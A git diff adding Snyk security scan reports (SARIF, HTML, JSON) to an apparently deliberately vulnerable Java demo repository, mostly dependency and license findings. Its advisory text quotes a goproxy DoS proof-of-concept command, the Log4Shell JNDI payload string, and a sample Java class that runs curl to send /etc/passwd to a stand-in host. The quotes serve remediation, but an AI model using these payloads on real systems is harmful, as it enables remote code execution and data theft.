"runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "properties": { + "artifactsScanned": 2 + }, + "rules": [ + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Execution vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2021-44832) org.apache.logging.log4j:log4j-core@2.14.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.snyk:log4shell-client@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.14.1\n### Detailed paths\n* _Introduced through_: io.snyk:log4shell-client@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.14.1\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n# Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n# References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 6.6, + "security-severity": "6.6" + } + } + ] + } + }, + "results": [ + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.14.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.17.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.17.1" + } + } + ] + } + ] + } + ] + } + ] + } + ] +} diff --git a/log4shell-goof/log4shell-server/.dccache b/log4shell-goof/log4shell-server/.dccache new file mode 100644 index 0000000000..56cc634701 --- /dev/null +++ b/log4shell-goof/log4shell-server/.dccache @@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/pom.xml":[2629,1707749068002.589,"69176bc5c5aed490d7cdeb4c3a6bf06f25d8e3609b2824d7cd7da97741f697ba"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Evil.java":[496,1707749068002.8047,"51919d812e029ba3072f606a02420fc15bf479506dfe8075a7042adca8923993"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Server.java":[7682,1707749068002.9707,"190e04c4ba5e3750e4fb8ff2f87c06b88a9b2cd7403ddb9458c9d4d3072d0aff"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Vandalize.java":[632,1707749068003.0623,"691d442e5a144bc4cc10204ebbf253abfa45ec13699d87b806c503b435850dc5"]} \ No newline at end of file diff --git a/log4shell-goof/test/snyk.html b/log4shell-goof/test/snyk.html new file mode 100644 index 0000000000..a653120f9a --- /dev/null +++ b/log4shell-goof/test/snyk.html @@ -0,0 +1,1600 @@ + + + + + + + + + Snyk test report + + + + + + + + + +
+
+
+
+ + + Snyk - Open Source Security + + + + + + + +
+

Snyk test report

+ +

May 31st 2024, 2:24:10 pm (UTC+00:00)

+
+
+ Scanned the following paths: +
    +
  • a1doll/k8sreconciler:beta/k8sreconciler (apk)
    • +
  • a1doll/k8sreconciler:beta/usr/app/sec/requirements.txt//usr/app/sec/requirements.txt (pip)
    • +
  • a1doll/k8sreconciler:beta//usr/local/bin/snyk (gomodules)
    • +
  • a1doll/k8sreconciler:beta/containerd/containerd//usr/bin/containerd-shim (gomodules)
    • +
  • a1doll/k8sreconciler:beta/containerd/containerd//usr/bin/containerd-shim-runc-v1 (gomodules)
    • +
  • a1doll/k8sreconciler:beta/containerd/containerd//usr/bin/containerd-shim-runc-v2 (gomodules)
    • +
+
+ +
+
13 known vulnerabilities
+
44 vulnerable dependency paths
+
1191 dependencies
+
+
+
+
+ +
+
+
+

Denial of Service (DoS)

+
+ +
+ high severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Vulnerable module: + + github.com/elazarl/goproxy +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/elazarl/goproxy@v0.0.0-20231031074852-3ec07828be7a + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/elazarl/goproxy@v0.0.0-20231031074852-3ec07828be7a + + + +
    • +
+ +
+ +
+ +

Overview

+

Affected versions of this package are vulnerable to Denial of Service (DoS) via unspecified vectors by sending a malformed request.

+

PoC

+ 
echo -e "GET * HTTP/1.1\r\n" | openssl s_client -proxy localhost:8000 -connect "localhost:8000" -ign_eof
+
+

Details

+

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

+

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

+

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

+

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

+

Two common types of DoS vulnerabilities:

+
    +

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

    +
    • +

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

    +
    • +
+

Remediation

+

A fix was pushed into the master branch but not yet published.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/terraform-registry-address +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/terraform-registry-address@v0.1.0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/terraform-registry-address@v0.1.0 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/hcl/v2 +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/hcl/v2@v2.16.0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2@v2.16.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/ext/customdecode@v2.16.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/ext/tryfunc@v2.16.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/ext/typeexpr@v2.16.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/gohcl@v2.16.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/hcldec@v2.16.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/hclparse@v2.16.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/hclsyntax@v2.16.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/v2/json@v2.16.0 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/hcl +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/hcl@v1.0.0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl@v1.0.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/ast@v1.0.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/parser@v1.0.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/printer@v1.0.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/scanner@v1.0.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/strconv@v1.0.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/hcl/token@v1.0.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/json/parser@v1.0.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/json/scanner@v1.0.0 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/hcl/json/token@v1.0.0 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/go-version +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-version@v1.6.0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-version@v1.6.0 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/go-uuid +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-uuid@v1.0.3 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-uuid@v1.0.3 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/go-safetemp +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-safetemp@v1.0.0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-safetemp@v1.0.0 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/go-retryablehttp +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-retryablehttp@v0.7.1 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-retryablehttp@v0.7.1 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/go-multierror +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-multierror@v1.1.1 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-multierror@v1.1.1 + + + +
    • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/go-multierror@v1.1.1 + + + +
    • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/go-multierror@v1.1.1 + + + +
    • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/go-multierror@v1.1.1 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/go-getter +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-getter@v1.7.4 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-getter@v1.7.4 + + + +
    • +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-getter/helper/url@v1.7.4 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/go-cleanhttp +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/go-cleanhttp@v0.5.2 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/go-cleanhttp@v0.5.2 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta /usr/local/bin/snyk +
    • +
  • + Package Manager: golang +
    • +
  • + Module: + + github.com/hashicorp/errwrap +
    • + +
  • Introduced through: + + go-distribution@command-line-arguments@* and github.com/hashicorp/errwrap@v1.1.0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + go-distribution@command-line-arguments@* + + github.com/hashicorp/errwrap@v1.1.0 + + + +
    • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/errwrap@v1.1.0 + + + +
    • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/errwrap@v1.1.0 + + + +
    • +
  • + Introduced through: + github.com/containerd/containerd@* + + github.com/hashicorp/errwrap@v1.1.0 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

MPL-2.0 license

+
+ +
+ medium severity +
+ +
+ +
    +
  • + Manifest file: a1doll/k8sreconciler:beta/usr/app/sec/requirements.txt /usr/app/sec/requirements.txt +
    • +
  • + Package Manager: pip +
    • +
  • + Module: + + certifi +
    • + +
  • Introduced through: + + /usr/app/sec/requirements.txt@* and certifi@2024.2.2 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + certifi@2024.2.2 + + + +
    • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + requests@2.32.1 + + certifi@2024.2.2 + + + +
    • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + kubernetes@29.0.0 + + certifi@2024.2.2 + + + +
    • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + google-auth@2.29.0 + + requests@2.32.1 + + certifi@2024.2.2 + + + +
    • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + kubernetes@29.0.0 + + requests@2.32.1 + + certifi@2024.2.2 + + + +
    • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + requests-oauthlib@2.0.0 + + requests@2.32.1 + + certifi@2024.2.2 + + + +
    • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + kubernetes@29.0.0 + + google-auth@2.29.0 + + requests@2.32.1 + + certifi@2024.2.2 + + + +
    • +
  • + Introduced through: + /usr/app/sec/requirements.txt@* + + kubernetes@29.0.0 + + requests-oauthlib@2.0.0 + + requests@2.32.1 + + certifi@2024.2.2 + + + +
    • +
+ +
+ +
+ +

MPL-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+
+
+ + + + diff --git a/output.json b/output.json new file mode 100644 index 0000000000..45a7eb4404 --- /dev/null +++ b/output.json @@ -0,0 +1,65575 @@ +[ + { + "vulnerabilities": [], + "ok": true, + "dependencyCount": 0, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\nexclude:\n global:\n - todolist-goof/exploits/zip-slip.py\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "No known vulnerabilities", + "filesystemPolicy": true, + "uniqueCount": 0, + "projectName": "io.github.snyk:java-goof", + "foundProjectCount": 7, + "displayTargetFile": "pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [], + "ok": true, + "dependencyCount": 0, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "No known vulnerabilities", + "filesystemPolicy": false, + "uniqueCount": 0, + "projectName": "io.snyk:log4shell-poc", + "foundProjectCount": 7, + "displayTargetFile": "log4shell-goof/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [ + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "credit": [ + "Chen Zhaojun of Alibaba Cloud Security Team" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.15.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 10, + "functions": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/lookup/JndiLookup.java", + "className": "JndiLookup", + "functionName": "lookup" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3198", + "title": "Apache Jira Issues" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3201", + "title": "Apache Jira Issues" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/logging-log4j2/pull/608", + "title": "GitHub PR" + }, + { + "url": "https://github.com/Kirill89/log4shell-vulnerable-server", + "title": "PoC" + }, + { + "url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/", + "title": "Snyk Blog and Vulnerability Breakdown" + }, + { + "url": "https://www.exploit-db.com/exploits/51183", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:43.264835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "description": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n
For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and 